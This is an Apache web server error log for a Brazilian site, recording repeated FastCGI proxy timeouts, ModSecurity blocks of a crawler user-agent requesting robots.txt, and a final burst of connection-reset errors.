[Mon Mar 16 02:37:32.122279 2026] [proxy_fcgi:error] [pid 11972:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:48788] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:37:53.127214 2026] [proxy_fcgi:error] [pid 11972:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:48932] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:38:15.153866 2026] [proxy_fcgi:error] [pid 32654:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:49112] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:38:36.138666 2026] [proxy_fcgi:error] [pid 10831:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:49238] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:38:44.210440 2026] [:error] [pid 11972:tid 140411733534464] [client 74.7.228.16:42932] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abeXZJqj1wV0Si-Okee7MgAAAAE"]
[Mon Mar 16 02:38:50.001591 2026] [:error] [pid 21806:tid 140411716749056] [client 74.7.244.31:40952] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abeXadSswJuvopo3lOg1_QAAAIM"]
[Mon Mar 16 02:38:58.123567 2026] [proxy_fcgi:error] [pid 21806:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:49402] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:39:19.121786 2026] [proxy_fcgi:error] [pid 21533:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:49626] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:39:40.133933 2026] [proxy_fcgi:error] [pid 10709:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:49784] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:40:01.122144 2026] [proxy_fcgi:error] [pid 10709:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:50004] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:40:22.141853 2026] [proxy_fcgi:error] [pid 10772:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:50144] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:40:47.125886 2026] [proxy_fcgi:error] [pid 32654:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:50344] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:41:08.113606 2026] [proxy_fcgi:error] [pid 11972:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:50486] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:41:30.393929 2026] [proxy_fcgi:error] [pid 32654:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:50642] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:41:52.045882 2026] [proxy_fcgi:error] [pid 32654:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:50778] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:42:13.125917 2026] [proxy_fcgi:error] [pid 21533:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:50910] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:42:34.137861 2026] [proxy_fcgi:error] [pid 21946:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:51022] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:42:55.037869 2026] [proxy_fcgi:error] [pid 21946:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:51130] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:43:16.106128 2026] [proxy_fcgi:error] [pid 32654:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:51202] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:43:37.131036 2026] [proxy_fcgi:error] [pid 32654:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:51314] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:43:58.102056 2026] [proxy_fcgi:error] [pid 21806:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:51444] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:44:02.091285 2026] [:error] [pid 32654:tid 140411624429312] [client 74.7.228.16:33802] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abeYoglT9VtDQc7bgUxu8QAAAQ4"]
[Mon Mar 16 02:44:19.125888 2026] [proxy_fcgi:error] [pid 21806:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:51562] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:44:38.360069 2026] [:error] [pid 10709:tid 140411616036608] [client 74.7.244.31:38470] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abeYxhXjF1vJNtV6CWrM-QAAAc8"]
[Mon Mar 16 02:44:40.062005 2026] [proxy_fcgi:error] [pid 10651:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:51680] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:45:01.084618 2026] [proxy_fcgi:error] [pid 21806:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:51808] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:45:23.543307 2026] [proxy_fcgi:error] [pid 32654:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:51980] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:45:45.125804 2026] [proxy_fcgi:error] [pid 10709:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:52132] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:46:10.087184 2026] [proxy_fcgi:error] [pid 21805:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:52332] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:46:31.134943 2026] [proxy_fcgi:error] [pid 10651:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:52436] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:46:53.071022 2026] [proxy_fcgi:error] [pid 10651:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:52612] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:47:15.137823 2026] [proxy_fcgi:error] [pid 11972:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:52752] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:47:36.113887 2026] [proxy_fcgi:error] [pid 21805:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:52926] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:47:57.126127 2026] [proxy_fcgi:error] [pid 32654:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:53056] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:48:18.137847 2026] [proxy_fcgi:error] [pid 32654:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:53180] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:48:39.125799 2026] [proxy_fcgi:error] [pid 21806:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:53266] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:49:00.121417 2026] [proxy_fcgi:error] [pid 32654:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:53400] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:49:21.133792 2026] [proxy_fcgi:error] [pid 21805:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:53486] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:49:42.129940 2026] [proxy_fcgi:error] [pid 21533:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:53618] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:50:03.133841 2026] [proxy_fcgi:error] [pid 21805:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:53730] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:50:13.474489 2026] [:error] [pid 32654:tid 140411548894976] [client 74.7.228.16:48482] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abeaFQlT9VtDQc7bgUxvrAAAARc"]
[Mon Mar 16 02:50:24.129793 2026] [proxy_fcgi:error] [pid 32654:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:53862] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:50:34.975009 2026] [:error] [pid 21946:tid 140411574073088] [client 74.7.244.31:54900] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abeaKnbQATo66fKoS7wdNwAAANQ"]
[Mon Mar 16 02:50:45.115806 2026] [proxy_fcgi:error] [pid 10772:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:54000] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:51:06.084465 2026] [proxy_fcgi:error] [pid 10772:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:54112] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:51:29.125946 2026] [proxy_fcgi:error] [pid 21533:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:54206] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:51:52.134108 2026] [proxy_fcgi:error] [pid 10651:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:54386] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:52:14.074020 2026] [proxy_fcgi:error] [pid 21806:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:54512] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:52:37.057987 2026] [proxy_fcgi:error] [pid 21806:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:54728] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:52:58.131363 2026] [proxy_fcgi:error] [pid 11972:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:54898] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:53:20.128134 2026] [proxy_fcgi:error] [pid 21806:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:55034] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:53:41.130297 2026] [proxy_fcgi:error] [pid 10709:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:55180] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:54:02.118155 2026] [proxy_fcgi:error] [pid 10831:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:55310] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:54:23.125800 2026] [proxy_fcgi:error] [pid 10651:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:55438] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:54:44.129184 2026] [proxy_fcgi:error] [pid 11972:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:55588] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:55:05.121442 2026] [proxy_fcgi:error] [pid 32654:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:55716] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:55:26.125957 2026] [proxy_fcgi:error] [pid 32654:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:55814] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:55:35.593114 2026] [:error] [pid 10709:tid 140411666392832] [client 74.7.244.31:58692] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abebVxXjF1vJNtV6CWrNaQAAAck"]
[Mon Mar 16 02:55:47.127263 2026] [proxy_fcgi:error] [pid 10772:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:55938] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:56:08.033784 2026] [proxy_fcgi:error] [pid 11972:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:56066] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:56:29.127744 2026] [proxy_fcgi:error] [pid 10772:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:56198] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:56:50.110004 2026] [proxy_fcgi:error] [pid 21533:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:56340] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:57:13.137789 2026] [proxy_fcgi:error] [pid 10772:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:56478] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:57:35.118247 2026] [proxy_fcgi:error] [pid 21533:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:56602] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:57:59.117868 2026] [proxy_fcgi:error] [pid 11972:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:56752] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:58:21.137834 2026] [proxy_fcgi:error] [pid 21533:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:57008] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:58:42.138662 2026] [proxy_fcgi:error] [pid 10831:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:57196] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:59:04.120010 2026] [proxy_fcgi:error] [pid 32654:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:57362] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:59:25.049573 2026] [proxy_fcgi:error] [pid 21946:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:57524] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:59:46.129980 2026] [proxy_fcgi:error] [pid 21533:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:57752] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 03:00:07.129807 2026] [proxy_fcgi:error] [pid 10709:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:57948] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 03:00:28.129817 2026] [proxy_fcgi:error] [pid 10709:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:58098] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 03:00:49.151466 2026] [proxy_fcgi:error] [pid 21946:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:58260] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 03:01:10.125806 2026] [proxy_fcgi:error] [pid 10831:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:58448] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 03:01:31.106389 2026] [proxy_fcgi:error] [pid 10831:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:58600] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 03:01:52.129796 2026] [proxy_fcgi:error] [pid 10831:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:58746] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 03:02:13.121875 2026] [proxy_fcgi:error] [pid 21533:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:58918] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 03:02:34.116794 2026] [proxy_fcgi:error] [pid 21805:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:59036] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 03:02:58.045838 2026] [proxy_fcgi:error] [pid 11972:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:59256] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 03:03:20.126204 2026] [proxy_fcgi:error] [pid 10651:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:59404] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 03:03:42.085648 2026] [proxy_fcgi:error] [pid 21533:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:59568] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 03:04:03.057864 2026] [proxy_fcgi:error] [pid 21946:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:59724] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 03:04:26.129813 2026] [proxy_fcgi:error] [pid 10831:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:59956] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 03:04:47.033809 2026] [proxy_fcgi:error] [pid 10831:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:60090] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 03:05:09.625857 2026] [proxy_fcgi:error] [pid 10772:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:60220] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 03:05:31.097919 2026] [proxy_fcgi:error] [pid 32654:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:60434] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 03:05:52.081798 2026] [proxy_fcgi:error] [pid 10772:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:60692] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 03:05:57.429209 2026] [:error] [pid 10709:tid 140411649607424] [client 74.7.228.16:43778] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abedxRXjF1vJNtV6CWrN3wAAAcs"]
[Mon Mar 16 03:06:13.046053 2026] [proxy_fcgi:error] [pid 21533:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:60848] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 03:06:14.664761 2026] [:error] [pid 21806:tid 140411658000128] [client 74.7.244.31:57412] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abed1tSswJuvopo3lOg3HAAAAIo"]
[Mon Mar 16 03:06:34.121804 2026] [proxy_fcgi:error] [pid 21806:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:32842] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 03:06:56.135134 2026] [proxy_fcgi:error] [pid 10772:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:33050] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 03:07:17.121682 2026] [proxy_fcgi:error] [pid 10831:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:33184] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 03:07:38.139340 2026] [proxy_fcgi:error] [pid 21805:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:33294] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 03:07:59.121852 2026] [proxy_fcgi:error] [pid 10772:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:33462] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 03:08:20.131486 2026] [proxy_fcgi:error] [pid 32654:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:33622] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 03:08:42.097807 2026] [proxy_fcgi:error] [pid 10831:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:33762] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 03:09:03.126466 2026] [proxy_fcgi:error] [pid 21806:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:33902] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 03:09:24.142105 2026] [proxy_fcgi:error] [pid 10709:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:33982] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 03:09:48.529515 2026] [proxy_fcgi:error] [pid 10831:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:34114] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 03:10:10.125794 2026] [proxy_fcgi:error] [pid 10651:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:34314] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 03:10:33.128169 2026] [proxy_fcgi:error] [pid 10709:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:34430] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 03:10:54.125791 2026] [proxy_fcgi:error] [pid 10651:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:34614] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 03:11:15.065847 2026] [proxy_fcgi:error] [pid 21805:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:34748] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 03:11:18.189843 2026] [:error] [pid 10709:tid 140411733534464] [client 74.7.228.16:58008] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abefBhXjF1vJNtV6CWrN-QAAAcE"]
[Mon Mar 16 03:11:37.061953 2026] [proxy_fcgi:error] [pid 11972:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:34856] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 03:11:42.483892 2026] [:error] [pid 21805:tid 140411565680384] [client 74.7.244.31:37264] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abefHrABkC4fWIHEf8HADQAAAFU"]
[Mon Mar 16 03:11:58.097994 2026] [proxy_fcgi:error] [pid 21805:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:34954] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 03:12:20.493883 2026] [proxy_fcgi:error] [pid 10831:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:35134] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 03:12:42.129400 2026] [proxy_fcgi:error] [pid 11972:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:35230] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 03:13:03.137785 2026] [proxy_fcgi:error] [pid 10709:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:35376] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 03:13:24.129784 2026] [proxy_fcgi:error] [pid 10831:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:35510] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 03:13:31.163601 2026] [proxy_fcgi:error] [pid 10772:tid 140411691570944] [client 179.188.53.243:35760] AH01067: Failed to read FastCGI header
[Mon Mar 16 03:13:31.163646 2026] [proxy_fcgi:error] [pid 10772:tid 140411691570944] (104)Connection reset by peer: [client 179.188.53.243:35760] AH01075: Error dispatching request to : 
[Mon Mar 16 03:13:31.163962 2026] [proxy_fcgi:error] [pid 10772:tid 140411666392832] [client 179.188.53.243:36094] AH01067: Failed to read FastCGI header
[Mon Mar 16 03:13:31.163973 2026] [proxy_fcgi:error] [pid 10772:tid 140411666392832] (104)Connection reset by peer: [client 179.188.53.243:36094] AH01075: Error dispatching request to : 
[Mon Mar 16 03:13:31.165390 2026] [proxy_fcgi:error] [pid 10772:tid 140411658000128] [client 179.188.53.243:35938] AH01067: Failed to read FastCGI header
[Mon Mar 16 03:13:31.165422 2026] [proxy_fcgi:error] [pid 10772:tid 140411658000128] (104)Connection reset by peer: [client 179.188.53.243:35938] AH01075: Error dispatching request to : 
[Mon Mar 16 03:13:31.165952 2026] [proxy_fcgi:error] [pid 11972:tid 140411649607424] [client 179.188.53.243:37060] AH01067: Failed to read FastCGI header
[Mon Mar 16 03:13:31.165984 2026] [proxy_fcgi:error] [pid 11972:tid 140411649607424] (104)Connection reset by peer: [client 179.188.53.243:37060] AH01075: Error dispatching request to : 
[Mon Mar 16 03:13:31.166405 2026] [proxy_fcgi:error] [pid 21533:tid 140411683178240] [client 179.188.53.243:35648] AH01067: Failed to read FastCGI header
[Mon Mar 16 03:13:31.166434 2026] [proxy_fcgi:error] [pid 21533:tid 140411683178240] (104)Connection reset by peer: [client 179.188.53.243:35648] AH01075: Error dispatching request to : 
[Mon Mar 16 03:13:31.175623 2026] [proxy_fcgi:error] [pid 21533:tid 140411649607424] [client 179.188.53.243:36490] AH01067: Failed to read FastCGI header
[Mon Mar 16 03:13:31.175651 2026] [proxy_fcgi:error] [pid 21533:tid 140411649607424] (104)Connection reset by peer: [client 179.188.53.243:36490] AH01075: Error dispatching request to : 
[Mon Mar 16 03:13:31.175926 2026] [proxy_fcgi:error] [pid 21946:tid 140411548894976] [client 179.188.53.243:36362] AH01067: Failed to read FastCGI header
[Mon Mar 16 03:13:31.175936 2026] [proxy_fcgi:error] [pid 21946:tid 140411548894976] (104)Connection reset by peer: [client 179.188.53.243:36362] AH01075: Error dispatching request to : 
[Mon Mar 16 03:13:31.176126 2026] [proxy_fcgi:error] [pid 32654:tid 140411674785536] [client 179.188.53.243:36230] AH01067: Failed to read FastCGI header
[Mon Mar 16 03:13:31.176138 2026] [proxy_fcgi:error] [pid 32654:tid 140411674785536] (104)Connection reset by peer: [client 179.188.53.243:36230] AH01075: Error dispatching request to : 
[Mon Mar 16 03:13:31.176323 2026] [proxy_fcgi:error] [pid 21946:tid 140411725141760] [client 179.188.53.243:37156] AH01067: Failed to read FastCGI header
[Mon Mar 16 03:13:31.176332 2026] [proxy_fcgi:error] [pid 21946:tid 140411725141760] (104)Connection reset by peer: [client 179.188.53.243:37156] AH01075: Error dispatching request to : 
[Mon Mar 16 03:13:31.176543 2026] [proxy_fcgi:error] [pid 21806:tid 140411582465792] [client 179.188.53.243:36778] AH01067: Failed to read FastCGI header
[Mon Mar 16 03:13:31.176572 2026] [proxy_fcgi:error] [pid 21806:tid 140411582465792] (104)Connection reset by peer: [client 179.188.53.243:36778] AH01075: Error dispatching request to : 
[Mon Mar 16 03:13:31.181775 2026] [proxy_fcgi:error] [pid 21533:tid 140411582465792] [client 179.188.53.243:36658] AH01067: Failed to read FastCGI header
[Mon Mar 16 03:13:31.181817 2026] [proxy_fcgi:error] [pid 21533:tid 140411582465792] (104)Connection reset by peer: [client 179.188.53.243:36658] AH01075: Error dispatching request to : 
[Mon Mar 16 03:13:31.182023 2026] [proxy_fcgi:error] [pid 10772:tid 140411557287680] [client 179.188.53.243:37248] AH01067: Failed to read FastCGI header
[Mon Mar 16 03:13:31.182042 2026] [proxy_fcgi:error] [pid 10772:tid 140411557287680] (104)Connection reset by peer: [client 179.188.53.243:37248] AH01075: Error dispatching request to : 
[Mon Mar 16 03:13:31.182675 2026] [proxy_fcgi:error] [pid 21533:tid 140411574073088] [client 179.188.53.243:36914] AH01067: Failed to read FastCGI header
[Mon Mar 16 03:13:31.182692 2026] [proxy_fcgi:error] [pid 21533:tid 140411574073088] (104)Connection reset by peer: [client 179.188.53.243:36914] AH01075: Error dispatching request to : 
